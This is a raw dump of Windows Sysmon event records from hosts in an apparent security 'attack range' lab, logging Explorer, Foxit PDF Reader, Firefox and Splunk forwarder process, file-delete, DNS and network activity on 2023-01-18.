12:16:45.117{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005288C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8a3be|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039545Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:45.117{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005288C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8a387|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039544Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:45.117{FE4C2B44-E1F1-63C7-9405-00000000AF02}3521020C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E1F3-63C7-9705-00000000AF02}7116C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+b7bc2c|C:\Program Files\Mozilla Firefox\xul.dll+f881b0|C:\Program Files\Mozilla Firefox\xul.dll+f86c65|C:\Program Files\Mozilla Firefox\xul.dll+f821a4|C:\Windows\System32\user32.dll+121e4|C:\Windows\System32\user32.dll+11ed7|C:\Windows\System32\user32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEB3BA2)|UNKNOWN(FFFFF3D9DFEB649B)|UNKNOWN(FFFFF3D9DFE2E09B)|UNKNOWN(FFFFF3D9DFE2DFD2)|UNKNOWN(FFFFF3D9DFF12279)|UNKNOWN(FFFFF3D9DFE2FDA8)|UNKNOWN(FFFFF3D9DFE2C7B5)|UNKNOWN(FFFFF3D9DFE15879)|UNKNOWN(FFFFF3D9DFE225B0)|UNKNOWN(FFFFF3D9DFE22189)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\win32u.dll+1b84 10341000x800000000000000039543Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:45.116{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8957f|C:\Windows\System32\SHELL32.dll+8ab30|C:\Windows\System32\TwinUI.dll+12ce81|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039542Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:45.116{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+1078f0|C:\Windows\System32\SHELL32.dll+8aaec|C:\Windows\System32\TwinUI.dll+12ce81|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039541Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:45.116{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8aac0|C:\Windows\System32\TwinUI.dll+12ce81|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039540Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:45.116{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\TwinUI.dll+12ccb9|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039539Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:45.017{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005288C:\Windows\Explorer.EXE{FE4C2B44-E1F1-63C7-9405-00000000AF02}352C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8a387|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039538Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:45.017{FE4C2B44-E1F1-63C7-9405-00000000AF02}3521020C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E1F3-63C7-9705-00000000AF02}7116C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+b7bc2c|C:\Program Files\Mozilla Firefox\xul.dll+f881b0|C:\Program Files\Mozilla Firefox\xul.dll+f86c65|C:\Program Files\Mozilla Firefox\xul.dll+f821a4|C:\Windows\System32\user32.dll+121e4|C:\Windows\System32\user32.dll+11ed7|C:\Windows\System32\user32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEB3BA2)|UNKNOWN(FFFFF3D9DFEB649B)|UNKNOWN(FFFFF3D9DFE2E09B)|UNKNOWN(FFFFF3D9DFE2DFD2)|UNKNOWN(FFFFF3D9DFE2CDE7)|UNKNOWN(FFFFF3D9DFE15779)|UNKNOWN(FFFFF3D9DFE153FB)|UNKNOWN(FFFFF3D9DFEBAE9F)|UNKNOWN(FFFFF3D9DFEAFD49)|UNKNOWN(FFFFF3D9DFEADE26)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\win32u.dll+10c4 10341000x800000000000000039537Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:45.017{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E1F1-63C7-9405-00000000AF02}352C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8aac0|C:\Windows\System32\TwinUI.dll+12ce81|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039536Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:45.017{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E1F1-63C7-9405-00000000AF02}352C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\TwinUI.dll+12ccb9|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x800000000000000039535Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:45.015{FE4C2B44-E32C-63C7-FA05-00000000AF02}3220C:\Users\Administrator\AppData\Roaming\Foxit Software\Addon\Foxit PDF Reader\FoxitPDFReaderUpdater.exe 10341000x800000000000000039534Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:45.012{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005288C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8957f|C:\Windows\System32\SHELL32.dll+8a4a5|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039533Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:45.012{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005288C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8a3be|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039532Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:45.012{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005288C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8a387|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039531Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:44.988{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8957f|C:\Windows\System32\SHELL32.dll+8ab30|C:\Windows\System32\TwinUI.dll+12ce81|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039530Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:44.988{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+1078f0|C:\Windows\System32\SHELL32.dll+8aaec|C:\Windows\System32\TwinUI.dll+12ce81|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039529Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:44.988{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8aac0|C:\Windows\System32\TwinUI.dll+12ce81|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039528Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:44.988{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\TwinUI.dll+12ccb9|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000039613Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:46.832{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57E56FCF010BFB73280BF96B94857417,SHA256=96BB67FAE7608EBA392F39C6AA83E8025320166AC15AC28B01558016E1E30DC8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 22542200x800000000000000039612Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:44.186{FE4C2B44-E32C-63C7-FA05-00000000AF02}3220us-request.foxitservice.com0::ffff:64.62.208.12;<unknown process> 354300x800000000000000039611Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:44.699{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local62874- 23542300x800000000000000039610Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:46.395{FE4C2B44-E32D-63C7-FB05-00000000AF02}6996ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\pingsender.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\saved-telemetry-pings\427643f4-4c37-40cb-b3ae-60b8792f9915MD5=0102517284EF240C23C26CE76999DA5C,SHA256=A53425A276932C052B8E4E435D612881D86694A147D599A171262E7E054499D4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000039609Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:46.330{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E32D-63C7-FC05-00000000AF02}1844C:\Windows\system32\conhost.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000039608Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:46.330{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E32D-63C7-FC05-00000000AF02}1844C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000039607Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:46.330{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E32D-63C7-FC05-00000000AF02}1844C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000039606Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:46.323{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E32D-63C7-FB05-00000000AF02}6996C:\Program Files\Mozilla Firefox\pingsender.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000039605Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:46.323{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E32D-63C7-FB05-00000000AF02}6996C:\Program Files\Mozilla Firefox\pingsender.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000039604Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:46.323{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E32D-63C7-FB05-00000000AF02}6996C:\Program Files\Mozilla Firefox\pingsender.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 23542300x800000000000000039603Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:46.228{FE4C2B44-E32D-63C7-FB05-00000000AF02}6996ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\pingsender.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\saved-telemetry-pings\6f9e4b5a-cf53-4959-9c07-f023402ce9d4MD5=A745BE3F65570C038DF524725DA79080,SHA256=BC9D1ABF37289E7184186EE7AA688DE5793C39556EB62E8821D5C3FCEA9C6318,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015065Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:16:46.014{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B443884409A662EEDC2FCDB314D766E4,SHA256=A12C00D8A4AA41136AFCFB7F25AC03DE9C88DF6A55865C69DEFB605FA80BA8EE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000039602Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:46.118{FE4C2B44-E32D-63C7-FB05-00000000AF02}6996ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\pingsender.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\saved-telemetry-pings\1052e587-2eb3-4423-ae75-ebf8abca3a74MD5=8AB2EC9F1AF52D43342D7204BCDF4A67,SHA256=8836BAA0EC258A0F2BD5787ACCBB50F9DD69C66EF2064CD5411339D471161228,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000039615Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:47.279{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=79B4295D6BDC147BABF803696766A0EB,SHA256=1CE65D7B1B29425EED249ACB8BD25B388B06FFD79D1208A97E96B65DA763F4E8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015066Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:16:47.109{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE3DE5CF458575E5CF27CFB1C3F5BFB5,SHA256=9F9AF28AB69EB17A5386DD1147008B065B278CD3932139FCE4CBEE8EB94F7D23,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000039614Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:44.236{FE4C2B44-E32C-63C7-FA05-00000000AF02}3220<unknown process>ATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56215-false64.62.208.12-443https 354300x800000000000000015068Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:16:47.036{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50034-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000015067Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:16:48.208{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F28F2041E168C4593A826C70FF3F132,SHA256=17FC4599B128885D5CD976D3385BD5D1557AF10B7B7D2C0DA0ED0964A711C7E0,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000039631Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:45.749{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT 